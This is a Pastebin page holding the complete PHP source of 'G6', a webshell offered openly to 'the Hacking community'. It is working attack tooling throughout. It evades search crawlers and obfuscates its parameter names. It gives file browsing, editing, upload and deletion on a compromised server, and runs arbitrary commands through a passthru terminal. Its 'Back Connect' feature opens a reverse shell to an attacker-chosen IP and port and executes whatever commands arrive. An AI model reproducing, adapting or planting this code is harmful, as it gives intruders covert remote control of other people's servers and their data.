This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!
Guest

G6

By: a guest on Aug 28th, 2012  |  syntax: PHP  |  size: 20.79 KB  |  views: 52  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <!DOCTYPE html>
  2. <html>
  3. <!--
  4.         G6 PHP webshell was coded by Mr. P-teo for the Hacking community.
  5.         G6 offers the following features:
  6.                 - File Browsing
  7.                 - File Editing
  8.                 - Create Files/Directories
  9.                 - Server Information
  10.                 - Password Hash Identifier
  11.                 - Terminal
  12.                 - Remote Back Connect
  13.  
  14.         G6 was designed so just about anyone can add new features and modify
  15.         it to their needs. Styles can easily be changed and New features can
  16.         easily be added.
  17.        
  18.         G6 is still under development, many more features will be added and
  19.         new security bypassing methods will be implemented.
  20.        
  21.         Still To add:
  22.                 - Bypass GET Method Not Implemented
  23.  
  24.         Hope everyone enjoys this shell and i look forward to seeing what
  25.         you can do with it.
  26. -->    
  27. <style stype="text/css">
  28. body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
  29. body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
  30. body a:hover{text-decoration:underline;}
  31. #main_content{border:1px solid #5C7296;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
  32. .enabled{color:#7ACC29;}
  33. .enabled a{color:#7ACC29;font-weight:normal;}
  34. .disabled{color:#CC0000;}
  35. .execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
  36. .viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
  37. .command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
  38. .response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
  39. .TableHeader_Name{width:550px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
  40. .TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
  41. .TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
  42. .filesize{color:green;text-align:center;}
  43. .filenames{}
  44. .filenames a{font-weight:normal;text-decoration:none;}
  45. .filenames a:hover{text-decoration:underline;}
  46. tr{background-color: #080808;}
  47. tr:hover{background-color:#282828;}
  48. #options{font-weight:200;font-family:tahoma;}
  49. #title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
  50. .Logo{font-size:150px;text-align:center;color:#101010;}
  51. .logotext{font-size:20px;text-align:center;color:#101010;}
  52. .terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
  53. .options{}
  54. .TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
  55. .box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
  56. .box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
  57. .optionstr {}
  58. .optionstr td{background-color:#0A0A0A;}
  59. .optionstr td:hover{background-color:#0A0A0A;}
  60. .backconnect{}
  61. .chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;}
  62. .godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
  63.  
  64.  
  65. </style>
  66. <body>
  67.         <div id="main_content">
  68. <?php
  69. ob_start();
  70. ini_set('error_reporting()', false);
  71. error_reporting(0);
  72. ini_set('memory_limit', '1000M');
  73. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  74.     header('HTTP/1.0 404 Not Found');
  75.     exit;
  76. }
  77.  
  78.  
  79. $ShellTitle = "G6 Shell v1.0 - Public .::Made By Mr. P-teo::.";
  80. echo "<title>".$ShellTitle."</title>";
  81.  
  82. function get_srv_info(){
  83.         echo "<br /><span id='title'>G6 Shell v1.0 - Public</span>";
  84.         echo "<br /><div class='box'><b>Server Name: </b>".$_SERVER["SERVER_NAME"]."<br />
  85.         <b>Server IP: </b>".$_SERVER["SERVER_ADDR"]." <span class='enabled'><a href='http://www.who.is/whois/".$_SERVER['HTTP_HOST']."' target='_blank'>[WHOIS]</a> - <a href='http://www.dnsstuff.com/tools?runFromMain=".$_SERVER["SERVER_ADDR"]."&toolType=traceroute' target='_blank'>[TRACEROUTE]</a></span><br />".
  86.         "<b>Shell Location: </b>".$_SERVER["SCRIPT_FILENAME"]."<br />
  87.         <b>Server Software: </b>".$_SERVER["SERVER_SOFTWARE"]." <span class='enabled'><a href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_SERVER['SERVER_SOFTWARE']."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' target='_blank'>[Exploit DB]</a></span><br />
  88.         </div>";
  89.         echo "<br /><br />
  90.         <p></p>
  91.  
  92.                
  93.         ";
  94. }
  95.  
  96.  
  97.  
  98.  
  99. $upload = $_GET['dXBsb2Fk'];
  100. $downloadfilename = $_GET['ZG93bg'];
  101. $delete = $_GET['delete'];
  102. $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
  103. $mkdir = $_GET['bWtkaXI'];
  104. $NavLinks = array(
  105.         array(
  106.                 "name" => "Main",
  107.                 "url" => "?"
  108.         ),
  109.         array(
  110.                 "name" => "Server Information",
  111.                 "url" => "?c3J2aW5mbw="
  112.         ),
  113.         array(
  114.                 "name" => "File Explorer",
  115.                 "url" => "?ZmlsZV9leHBsb3Jlcg=".dirname(__FILE__)."/"
  116.         ),
  117.         array(
  118.                 "name" => "Terminal",
  119.                 "url" => "?dGVybWlhbmw"
  120.         ),
  121.         array(
  122.                 "name" => "Hash Identifier",
  123.                 "url" => "?aGk="
  124.         ),
  125.         array(
  126.                 "name" => "BackConnect",
  127.                 "url" => "?YmNrbmV0="
  128.         ),
  129.         array(
  130.                 "name" => "Shell-101",
  131.                 "url" => "?a253aXN1ZQ"
  132.         )
  133. );
  134.  
  135. $CurrentUrl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  136. $last = count($NavLinks) - 1;
  137. foreach($NavLinks as $NavLink => $NavRow){
  138.         $linknames = ($NavLink == 0);
  139.     $linkurls = ($NavLink == $last);
  140.         echo '<a href="'.$NavRow['url'].'">'.$NavRow['name'].'</a> / ';
  141. }
  142. if(strstr($CurrentUrl, "readfile")){
  143.                 $sourcefile = $_REQUEST['readfile'];
  144.                 if(is_file($sourcefile)){
  145.         get_srv_info();
  146.         if(isset($sourcefile))
  147.         {
  148.             $Finalsource = file_get_contents($sourcefile);             
  149.  
  150.                 echo "<form action='' method='POST'><textarea name='sourcecode' class='viewsource' rows='20' cols='121'>".htmlentities($Finalsource)."</textarea><br /><input type='Submit' value='Save File' name='save' /></form>";
  151.                 }
  152.                 }else{
  153.                         echo "Data not sent.";
  154.                 }
  155.                 if(isset($_POST['save'])){
  156.                         $new_source = $_POST['sourcecode'];
  157.                         $source_edit = fopen($sourcefile, 'w');
  158.                         fwrite($source_edit, $new_source);
  159.                         fclose($source_edit);
  160.                 }
  161. }elseif(strstr($CurrentUrl, "LIa87yob")){
  162.         get_srv_info();
  163. echo '
  164. <form action="" method="POST">
  165. <table>
  166. <tr class="optionstr">
  167. <td>Url: </td>
  168. <td><input type="text name="url" class="command" /></td>
  169. </tr>
  170. </table>
  171. </form>
  172. ';
  173.  
  174. }elseif(strstr($CurrentUrl, "aGk")){
  175.         get_srv_info();
  176.         echo "<p>G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).</p>";
  177.         if(isset($_POST['gethash'])){
  178.                 $hash = $_POST['hash'];
  179.                 if(strlen($hash)==32){
  180.                         $hashresult == "MD5 Hash";
  181.                 }elseif(strlen($hash)==40){
  182.                         $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  183.                 }elseif(strlen($hash)==13){
  184.                         $hashresult = "DES(Unix) Hash";
  185.                 }elseif(strlen($hash)==16){
  186.                         $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  187.                 }elseif(strlen($hash)==41){
  188.                         $GetHashChar = substr($hash, 40);
  189.                         if($GetHashChar == "*"){
  190.                                 $hashresult = "MySQL5 Hash";
  191.                         }      
  192.                 }elseif(strlen($hash)==64){
  193.                         $hashresult = "SHA-256 Hash";
  194.                 }elseif(strlen($hash)==96){
  195.                         $hashresult = "SHA-384 Hash";
  196.                 }elseif(strlen($hash)==128){
  197.                         $hashresult = "SHA-512 Hash";
  198.                 }elseif(strlen($hash)==34){
  199.                         if(strstr($hash, '$1$')){
  200.                                 $hashresult = "MD5(Unix) Hash";
  201.                         }      
  202.                 }elseif(strlen($hash)==37){
  203.                         if(strstr($hash, '$apr1$')){
  204.                                 $hashresult = "MD5(APR) Hash";
  205.                         }      
  206.                 }elseif(strlen($hash)==34){
  207.                         if(strstr($hash, '$H$')){
  208.                                 $hashresult = "MD5(phpBB3) Hash";
  209.                         }      
  210.                 }elseif(strlen($hash)==34){
  211.                         if(strstr($hash, '$P$')){
  212.                                 $hashresult = "MD5(Wordpress) Hash";
  213.                         }      
  214.                 }elseif(strlen($hash)==39){
  215.                         if(strstr($hash, '$5$')){
  216.                                 $hashresult = "SHA-256(Unix) Hash";
  217.                         }      
  218.                 }elseif(strlen($hash)==39){
  219.                         if(strstr($hash, '$6$')){
  220.                                 $hashresult = "SHA-512(Unix) Hash";
  221.                         }      
  222.                 }elseif(strlen($hash)==24){
  223.                         if(strstr($hash, '==')){
  224.                                 $hashresult = "MD5(Base-64) Hash";
  225.                         }      
  226.                 }else{
  227.                         $hashresult = "Hash type not found";
  228.                 }
  229.         }else{
  230.                 $hashresult = "Not Hash Entered";
  231.         }
  232.         echo '
  233.         <center>
  234.                 <form action="" method="POST">
  235.                         <table>
  236.                                 <tr class="optionstr">
  237.                                         <td>Enter Hash:</td>
  238.                                         <td><input type="text" name="hash" class="command" /></td>
  239.                                         <td><input type="submit" name="gethash" value="Identify Hash" /></td>
  240.                                 </tr>
  241.                                 <tr class="optionstr">
  242.                                         <td>Result: </td>
  243.                                         <td>'.$hashresult.'</td>
  244.                                 </tr>
  245.                         </table>
  246.                 </form>
  247.         </center>
  248.         ';
  249.        
  250.  
  251. }elseif(strstr($CurrentUrl, "dXBsb2Fk")){
  252.         get_srv_info();
  253. echo '<h3>G6 File Uploader</h3><br />';
  254.  
  255.                 echo '
  256.                 <form action="" method="POST" enctype="multipart/form-data"><table>
  257.                                 <tr class="optionstr">
  258.                                         <td>Path: <input type="text" name="path" value="'.$upload.'/" />
  259.                                 </tr>
  260.                                 <tr class="optionstr">
  261.                                 <td ><input type="file" name="file" ></td></tr><tr><td align="right"><input type="submit" name="upload" value="Upload" alt="Upload"  class="open"></td>
  262.                                 </tr>
  263.                                 </table>
  264.                 ';
  265.                         if(isset($_FILES['file'])){
  266.                                
  267.                                 $errors = array();
  268.                                
  269.                                 $file_name = $_FILES['file']['name'];
  270.                 $file_tmp = $_FILES['file']['tmp_name'];
  271.                                
  272.                                 if(empty($errors)){
  273.                                         if (move_uploaded_file($file_tmp, $_POST['path'].$file_name)){
  274.                                                 echo "Upload Complete";
  275.                                         }
  276.                                 } else {
  277.                                         foreach($errors as $error){
  278.                                                 echo $error.'<br>';
  279.                                         }
  280.                                 }
  281.                                
  282.                                
  283.                         }
  284. }elseif(strstr($CurrentUrl, "YmNrbmV0")){
  285.         get_srv_info();
  286.         echo '
  287. <div id="back">
  288.            <h2>Back Connect</h2>
  289.            <p>Back connect will allow you to enter system commands remotely.</p>
  290.            <p>
  291.            <table>
  292.                                 <form action="" method="post">
  293.                                 <tr class="optionstr"><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  294.                                 <tr class="optionstr"><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  295.                                 <tr class="optionstr"><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  296.                                 </form>
  297.                                 </table>';
  298.                                 if(isset($_POST['bind']))
  299.                                         {
  300.                                                 ini_set('max_execution_time', 0);
  301.                                                 echo "<p>Attempting Connection...</p>";
  302.                                                 $ip = $_POST['ip'];
  303.                                                 $port= $_POST['port'];
  304.                                                 $sockfd=fsockopen($ip , $port , $errno, $errstr );
  305.                                                 if($errno != 0)
  306.                                                 {
  307.                                                         echo "<font color='red'><b>$errno</b> : $errstr</font>";
  308.                                                 }
  309.                                                 else if (!$sockfd)
  310.                                                 {
  311.                                                         $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  312.                                                 }
  313.                                                 else
  314.                                                 {
  315.                                                         fputs ($sockfd ,
  316.                                                         "\n{################################################################}\n
  317.                                                                 ..:: G6 W3b Sh3ll v1.0- Coded By Mr. P-teo ::..\n\n
  318.  
  319.                                                                 => Backconnect \n
  320.                                                                 => Back \n
  321.                                                          \n{################################################################}");
  322.                                                          $pwd = shell_exec("pwd");
  323.                                                          $sysinfo = shell_exec("uname -a");
  324.                                                          $time = Shell_exec("time");
  325.                                                          $len = 1337;
  326.                                                          fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  327.                                                  while(!feof($sockfd))
  328.                                                  {
  329.                                                         $cmdPrompt = '[G6]#:> ';
  330.                                                         fputs ($sockfd , $cmdPrompt );
  331.                                                         $command= fgets($sockfd, $len);
  332.                                                         fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  333.                                                  }
  334.                                                  fclose($sockfd);
  335.                                                 }
  336.                                         }
  337.                 echo "
  338.                         </p>
  339.        </div>";
  340. }elseif(strstr($CurrentUrl, "bWtmbA")){
  341.         get_srv_info();
  342.         echo "<p>If no file path is included it will be created within the same directory as the shell.</p>
  343.                 <form action='' method='post'>
  344.                 <p>Filename: <input type='text' name='newfilename' /></p>
  345.                 <p><input type='submit' value='Create File' name='create' /></p>
  346.                 </form>";
  347.         $newfilename = htmlentities($_POST['newfilename']);
  348.         if(isset($_POST['create'])){
  349.                 $ourFileName = $newfilename;
  350.                 $ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");
  351.                 fclose($ourFileHandle);
  352.         }
  353.         echo "
  354.                 <br /><br /><hr />
  355.         <p>Coded By Mr. P-teo</p>";
  356. }elseif(strstr($CurrentUrl, "bWtkaXI")){
  357.         get_srv_info();
  358.         echo "<p>If no file path is included directory will be created within the same directory as the shell.</p>
  359.                 <form action='' method='post'>
  360.                 <p>Directory Name: <input type='text' name='newdirname' /></p>
  361.                 <p><input type='submit' value='Create New Directory' name='createdir' /></p>
  362.                 </form>";
  363.         $newdirname = htmlentities($_POST['newdirname']);
  364.         if(isset($_POST['createdir'])){
  365.                 $ourdirName = $newdirname;
  366.                 mkdir($ourdirName, 0777);
  367.                 echo "Directory Created!";
  368.         }
  369.         echo "
  370.                 <br /><br /><hr />
  371.         <p>Coded By Mr. P-teo</p>";
  372. }elseif(strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")){
  373.                 get_srv_info();
  374.                 $upload = $file_explorer;
  375.                 echo '<p><form action="" method="POST"><table><tr class="optionstr"><td><input class="chdir" type="text" name="chdir" value="'.$file_explorer.'"" /></td><td><input type="submit" class="godir" name="godir" value=">>" /></td></form><td><div id="options"><a href="?bWtkaXI='.$file_explorer.'">Make Directory</a> | <a href="?bWtmbA='.$file_explorer.'">Make File</a> | <a href="?dXBsb2Fk='.$upload.'">Upload</a></div></td></tr>';
  376.                 if(isset($_POST['godir'])){
  377.                         $mandircha = $_POST['chdir'];
  378.                         if($mandircha){
  379.                                 header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_POST['chdir']);
  380.                         }
  381.                 }
  382.         ?>
  383.  
  384.         </div></p>
  385.                         <table class="FileBrowserTable">
  386.                                 <tr>
  387.                                         <td class="TableHeader_Name"> FileName's</td>
  388.                                         <td class="TableHeader">Filetype</a>
  389.                                         <td class="TableHeader">Size</td>
  390.                                         <td class="TableHeader">Permisions</td>
  391.                                         <td class="TableHeaderoptions"> Options</td>
  392.                                 </tr>
  393.                                 <?php
  394.                 $Shell_Directory = $_SERVER['REMOTE_DIR'];
  395.  
  396.  
  397.                 if(!isset($file_explorer) || empty($file_explorer)){
  398.                 }else{
  399.                         //load files...        
  400.                 $filenames = scandir($file_explorer);
  401.                 foreach($filenames as $filename){
  402.                         if(empty($filenames)){
  403.                                 echo "Unable To Brows Directory.";
  404.                                 break;
  405.                         }
  406.                         if(is_writable($filename)){
  407.                                 $perm = "--w";}else{
  408.                                 $perm = "--?";
  409.                         }
  410.                         if(is_readable($filename)){
  411.                                 $perm = "--r".$perm;
  412.                         }else{
  413.                                 $perm = "--?".$perm;
  414.                         }
  415.                         if(is_executable($filename)){
  416.                                 $perm = "x".$perm;
  417.                         }else{
  418.                                 $perm = "<span class='disabled'>?".$perm."</span>";
  419.                         }
  420.                         $type = Filetype($filename);
  421.                         $mod = date("F j, g:i a", filemtime($filename));
  422.                         $filesize = round(filesize($filename) / 1024, 2);
  423.                         if($file_explorer == $_SERVER['DOCUMENT_ROOT']."/"){
  424.                                 if($filename == ".."){
  425.                                         $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/"));
  426.                                         echo "<tr><td><span class='filenames'><a href='?ZmlsZV9leHBsb3Jlcg=".$file_explorer."/'>".$filename."</a></span></td><td><center>".$type."</center></td><td><center><span class='filesize'>".$filesize."Kb</span></center></td><td><center>".$perm."</center></td><td></td></tr>";
  427.                                 }elseif($filename == "."){
  428.                                         $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/"));
  429.                                         echo "<tr><td><span class='filenames'><a href='?ZmlsZV9leHBsb3Jlcg=".$file_explorer."/'>".$filename."</a></span></td><td><center>".$type."</center></td><td><center><span class='filesize'>".$filesize."Kb</span></center></td><td><center>".$perm."</center></td><td></td></tr>";
  430.                                 }else{
  431.                                         $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
  432.                                         echo "<tr><td><span class='filenames'><a href='?ZmlsZV9leHBsb3Jlcg=".$file_explorer."/".$filename."'>".$filename."</a></span></td><td><center>".$type."</center></td><td><center><span class='filesize'>".$filesize."Kb</span></center></td><td><center>".$perm."</center></td><td><span class='options'><a href='?readfile=".$file_explorer."/".$filename."'>edit</a> | <a href='?delete=".$file_explorer."/".$filename."'>del</a> | <a href='http://".$_SERVER['HTTP_HOST']."/".$file_explorer.$filename."' target='_blank'></a></span></td></tr>";
  433.                                 }
  434.                         }else{
  435.                                 if($filename == ".."){
  436.                                         $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/"));
  437.                                         echo "<tr><td><span class='filenames'><a href='?ZmlsZV9leHBsb3Jlcg=".$file_explorer."/'>".$filename."</a></span></td><td><center>".$type."</center></td><td><center><span class='filesize'>".$filesize."Kb</span></center></td><td><center>".$perm."</center></td><td></td></tr>";
  438.                                 }elseif($filename == "."){
  439.                                         $file_explorer = substr($file_explorer, 0, strrpos($file_explorer, "/"));
  440.                                         echo "<tr><td><span class='filenames'><a href='?ZmlsZV9leHBsb3Jlcg=".$file_explorer."/'>".$filename."</a></span></td><td><center>".$type."</center></td><td><center><span class='filesize'>".$filesize."Kb</span></center></td><td><center>".$perm."</center></td><td></td></tr>";
  441.                                 }else{
  442.                                         $file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
  443.                                         echo "<tr><td><span class='filenames'><a href='?ZmlsZV9leHBsb3Jlcg=".$file_explorer."/".$filename."'>".$filename."</a></span><td><center>".$type."</center></td></td><td><center><span class='filesize'>".$filesize."Kb</span></center></td><td><center>".$perm."</center></td><td><span class='options'><a href='?readfile=".$file_explorer."/".$filename."'>edit</a> | <a href='?delete=".$file_explorer."/".$filename."'>del</a> | <a href='http://".$_SERVER["HTTP_HOST"]."/".$file_explorer.$filename."' target='_blank'></a></span></td></tr>";
  444.                                 }
  445.                         }
  446.                        
  447.                 }
  448.         }
  449. ?>
  450. </table>
  451.                 <br /><br /><hr />
  452.         <p>Coded By Mr. P-teo</p>
  453. <?php
  454. }elseif(strstr($CurrentUrl, "ZG93bg")){
  455.        
  456. }elseif(strstr($CurrentUrl, "delete")){
  457.                         unlink($delete);
  458.                         rmdir($delete);
  459.                         header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_SERVER['REMOTE_DIR']);
  460.        
  461.  
  462. }elseif(strstr($CurrentUrl, "c3J2aW5mbw")){
  463.         get_srv_info();
  464.   $s_safemode = ini_get("safe_mode");
  465.   if($s_safemode = TRUE){
  466.         $s_safemode = "<span class='enabled'>[ON";
  467.   }else{
  468.         $s_safemode = "<span class='disabled'>[OFF";
  469.   }
  470. if(extension_loaded('curl')){
  471. $curls="<span class='enabled'>[ON]</span>";
  472. }else{
  473. $curls="<span class='disabled'>[OFF]</span>";
  474. }
  475.         echo "
  476.         <b>Server Port: </b>".$_SERVER['SERVER_PORT']."<br /><br />
  477.         <b>HTTP Connection: </b>".$_SERVER['HTTP_CONNECTION']."<br /><br />
  478.         <b>Operating System:</b> ".php_uname()."<br /><br />";
  479.  
  480.         if(get_magic_quotes_gpc()){
  481.                 echo "<b>Magic Quotes:</b> <span class='enabled'>[ENABLED]</span><br /><br />";
  482.         }else{
  483.                 echo "<b>Magic Quotes:</b> <span class='disabled'>[DISABLED]</span><br /><br />";
  484.         }
  485.         echo "<b>PHP Version:</b> ".phpversion()."<br /><br />
  486.         <b>Safe Mode: </b>".$s_safemode."]</span>
  487.                 <br /><br />
  488.         <b>Curl: </b>".$curls."<hr />
  489.         <p>Coded By Mr. P-teo</p>
  490.  
  491.         ";
  492. }elseif(strstr($CurrentUrl, "dGVybWlhbmw")){
  493.        
  494.         get_srv_info();
  495.         //Needs more work.
  496.  
  497.  
  498.         echo '
  499.                
  500.                 <form action="" method="post">
  501.                 <table>
  502.                 <tr>
  503.                         <td><b>Command Execution: </b></td><td><input type="text" placeholder="root~$ " autocomplete="off" name="command" class="command"/></td>
  504.                 </tr>
  505.                 </table>';
  506.                 $out = array();
  507.                 passthru($_POST['command'], $out);
  508.                 foreach ($out as $line) {
  509.                         echo "$line\n";
  510.                 }
  511.                 echo '
  512.         <p>Coded By Mr. P-teo</p>
  513.         ';
  514.  
  515. }elseif(strstr($CurrentUrl, "a253aXN1ZQ")){
  516.         get_srv_info();
  517.         echo "
  518.                 <h4>Information</h4>
  519.                 <p>G6 Shell v1.0 Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.</p>
  520.                 <ul>
  521.                         <li>Delete Directory With Contents.</li>
  522.                         <li>When opening large files can run out of memory.</li>
  523.                         <li>Create File/Dir requires directory path.</li>
  524.                         <li>Editing can run into trouble with GET Method Not Implemented error.</li>
  525.                         <li>Doesn't display contents of /home/ directory, needs url manipulation to get to the root folder.</p>
  526.                 </ul>
  527.                 <br /><br /><hr />
  528.         <p>Coded By Mr. P-teo</p>
  529.         ";
  530. }else{
  531.         get_srv_info();
  532.         echo "<br /><br />
  533.         <p></p>
  534.  
  535.         <br /><br />
  536.         <div class='Logo'>G6 v1.0</div>
  537.         <div class='logotext'>Public Shell Coded By Mr. P-teo</div><br /><br /><br /><hr />
  538.         <p>Coded By Mr. P-teo</p>
  539.         ";
  540. }
  541. ob_flush()
  542. ?>
  543. </div>
  544. <body>
  545. </html>
clone this paste RAW Paste Data